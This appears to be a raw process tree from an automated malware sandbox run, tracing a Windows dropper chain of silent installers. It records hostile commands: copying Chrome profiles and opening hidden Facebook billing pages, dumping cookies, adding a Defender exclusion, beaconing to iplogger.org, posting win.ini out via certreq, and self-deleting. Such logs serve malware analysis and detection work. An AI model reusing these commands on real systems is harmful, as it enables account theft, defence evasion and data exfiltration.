C:\Users\Admin\AppData\Local\Temp\is-Q30S0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-Q30S0.tmp\Setup.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IO8BB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IO8BB.tmp\Setup.tmp" /SL5="$2075C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-Q30S0.tmp\Setup.exe" /Verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Messure.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0S9B2.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-0S9B2.tmp\Messure.tmp" /SL5="$90538,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Messure.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AN15I.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AN15I.tmp\Setup.exe" /VERYSILENT14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\PictureLAb.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JVMI0.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-JVMI0.tmp\PictureLAb.tmp" /SL5="$50676,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\PictureLAb.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PPTBG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PPTBG.tmp\Setup.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K49IE.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-K49IE.tmp\Setup.tmp" /SL5="$20810,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-PPTBG.tmp\Setup.exe" /VERYSILENT15⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3CFEA.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-3CFEA.tmp\def.exe" /S /UID=lab21416⤵
-
C:\Users\Admin\AppData\Local\Temp\63-c321b-ba2-0cea8-c9a095b0edd2d\Waejaewaxelo.exe"C:\Users\Admin\AppData\Local\Temp\63-c321b-ba2-0cea8-c9a095b0edd2d\Waejaewaxelo.exe"17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\04rventp.gyy\md7_7dfj.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\04rventp.gyy\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\04rventp.gyy\md7_7dfj.exe19⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a4clejwb.s2p\askinstall18.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\a4clejwb.s2p\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\a4clejwb.s2p\askinstall18.exe19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe20⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe21⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y20⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/20⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2021⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,13783270682761060530,88082000358438362,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1648 /prefetch:821⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5kuhogcj.hck\customer4.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\5kuhogcj.hck\customer4.exeC:\Users\Admin\AppData\Local\Temp\5kuhogcj.hck\customer4.exe19⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"20⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w110ctw4.q4x\GcleanerWW.exe /mixone & exit18⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exe19⤵
-
C:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exe20⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ghku2kw.vg3\setup.exe /8-2222 & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\5ghku2kw.vg3\setup.exeC:\Users\Admin\AppData\Local\Temp\5ghku2kw.vg3\setup.exe /8-222219⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Old-Sound"20⤵
-
-
C:\Program Files (x86)\Old-Sound\7za.exe"C:\Program Files (x86)\Old-Sound\7za.exe" e -p154.61.71.51 winamp-plugins.7z20⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Old-Sound\setup.exe" -map "C:\Program Files (x86)\Old-Sound\WinmonProcessMonitor.sys""20⤵
-
C:\Program Files (x86)\Old-Sound\setup.exe"C:\Program Files (x86)\Old-Sound\setup.exe" -map "C:\Program Files (x86)\Old-Sound\WinmonProcessMonitor.sys"21⤵
-
-
-
C:\Program Files (x86)\Old-Sound\7za.exe"C:\Program Files (x86)\Old-Sound\7za.exe" e -p154.61.71.51 winamp.7z20⤵
-
-
C:\Program Files (x86)\Old-Sound\setup.exe"C:\Program Files (x86)\Old-Sound\setup.exe" /8-222220⤵
-
C:\Program Files (x86)\Old-Sound\setup.exe"C:\Program Files (x86)\Old-Sound\setup.exe" /8-222221⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\whjvidn4.zqs\MultitimerFour.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\whjvidn4.zqs\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\whjvidn4.zqs\MultitimerFour.exe19⤵
-
C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10420⤵
-
C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe" 1 3.1615354240.60485980501cc 10421⤵
-
C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe" 2 3.1615354240.60485980501cc22⤵
-
C:\Users\Admin\AppData\Local\Temp\tlyqtmbx5hk\hlghtc01dbq.exe"C:\Users\Admin\AppData\Local\Temp\tlyqtmbx5hk\hlghtc01dbq.exe" /ustwo INSTALL23⤵
-
-
C:\Users\Admin\AppData\Local\Temp\rnejsvukehq\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\rnejsvukehq\askinstall24.exe"23⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2025⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,12140673914739305102,330341830004578802,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1644 /prefetch:825⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\y2bipyttlx0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\y2bipyttlx0\Setup3310.exe" /Verysilent /subid=57723⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SDQBT.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-SDQBT.tmp\Setup3310.tmp" /SL5="$6097C,802346,56832,C:\Users\Admin\AppData\Local\Temp\y2bipyttlx0\Setup3310.exe" /Verysilent /subid=57724⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IC31F.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IC31F.tmp\Setup.exe" /Verysilent25⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SN95L.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SN95L.tmp\Setup.tmp" /SL5="$20A20,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IC31F.tmp\Setup.exe" /Verysilent26⤵
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Messure.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8L97F.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-8L97F.tmp\Messure.tmp" /SL5="$10AB6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Messure.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0ULDJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0ULDJ.tmp\Setup.exe" /VERYSILENT29⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\PictureLAb.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B98R9.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-B98R9.tmp\PictureLAb.tmp" /SL5="$60834,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\PictureLAb.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TPV82.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TPV82.tmp\Setup.exe" /VERYSILENT29⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3ITQ9.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-3ITQ9.tmp\Setup.tmp" /SL5="$30AEC,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-TPV82.tmp\Setup.exe" /VERYSILENT30⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H59DP.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-H59DP.tmp\def.exe" /S /UID=lab21431⤵
-
C:\Users\Admin\AppData\Local\Temp\bd-12e9e-594-9e4ac-b5f747c31fa8c\Larecodeme.exe"C:\Users\Admin\AppData\Local\Temp\bd-12e9e-594-9e4ac-b5f747c31fa8c\Larecodeme.exe"32⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uxaiim15.5zl\md7_7dfj.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\uxaiim15.5zl\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\uxaiim15.5zl\md7_7dfj.exe34⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b5n2xlxz.ntn\askinstall18.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\b5n2xlxz.ntn\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\b5n2xlxz.ntn\askinstall18.exe34⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe35⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe36⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y35⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5laxtx1p.knr\customer4.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\5laxtx1p.knr\customer4.exeC:\Users\Admin\AppData\Local\Temp\5laxtx1p.knr\customer4.exe34⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"35⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rw0rstkx.g5d\GcleanerWW.exe /mixone & exit33⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exe34⤵
-
C:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exe35⤵
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Delta.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-43A4E.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-43A4E.tmp\Delta.tmp" /SL5="$40ADA,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Delta.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1TJ45.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1TJ45.tmp\Setup.exe" /VERYSILENT29⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-1TJ45.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit30⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f31⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\zznote.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-L1D30.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-L1D30.tmp\zznote.tmp" /SL5="$60B94,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\zznote.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SCCCV.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-SCCCV.tmp\jg4_4jaa.exe" /silent29⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\hjjgaa.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2zas3fueio2\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\2zas3fueio2\chashepro3.exe" /VERYSILENT23⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q1GJJ.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q1GJJ.tmp\chashepro3.tmp" /SL5="$209D0,1478410,58368,C:\Users\Admin\AppData\Local\Temp\2zas3fueio2\chashepro3.exe" /VERYSILENT24⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Delta.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ICOBB.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-ICOBB.tmp\Delta.tmp" /SL5="$60676,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Delta.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RUITR.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RUITR.tmp\Setup.exe" /VERYSILENT14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-RUITR.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 616⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\zznote.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KG0SK.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-KG0SK.tmp\zznote.tmp" /SL5="$607C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\zznote.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CP0AR.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-CP0AR.tmp\jg4_4jaa.exe" /silent14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\hjjgaa.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\j4xbcg2nsqr\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\j4xbcg2nsqr\askinstall24.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y9⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/9⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,6138945573974933891,118601829407231764,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1744 /prefetch:810⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1484,6138945573974933891,118601829407231764,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1552 /prefetch:210⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\t1emmpifrql\gnlptcgkti5.exe"C:\Users\Admin\AppData\Local\Temp\t1emmpifrql\gnlptcgkti5.exe" /ustwo INSTALL8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\aff4jmhe3hq\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\aff4jmhe3hq\chashepro3.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-C478O.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-C478O.tmp\chashepro3.tmp" /SL5="$D050E,1478410,58368,C:\Users\Admin\AppData\Local\Temp\aff4jmhe3hq\chashepro3.exe" /VERYSILENT9⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\E93D.tmp.exe"C:\Users\Admin\AppData\Roaming\E93D.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\E93D.tmp.exe"C:\Users\Admin\AppData\Roaming\E93D.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Roaming\EA18.tmp.exe"C:\Users\Admin\AppData\Roaming\EA18.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\EA18.tmp.exe"{path}"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\EA18.tmp.exe"{path}"6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
-
C:\ProgramData\6756324.74"C:\ProgramData\6756324.74"5⤵
- Executes dropped EXE
-
-
C:\ProgramData\6943189.76"C:\ProgramData\6943189.76"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
-
-
-
C:\ProgramData\3402114.37"C:\ProgramData\3402114.37"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\3402114.37"{path}"6⤵
-
-
-
C:\ProgramData\5628588.61"C:\ProgramData\5628588.61"5⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 50F9AA333D3AF30AE9EE2DD59695F489 C2⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\is-4TVO7.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-4TVO7.tmp\chashepro3.tmp" /SL5="$102AE,1478410,58368,C:\Users\Admin\AppData\Local\Temp\mno5qur0nrc\chashepro3.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"2⤵
- Checks computer location settings
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\23⤵
-
-
-
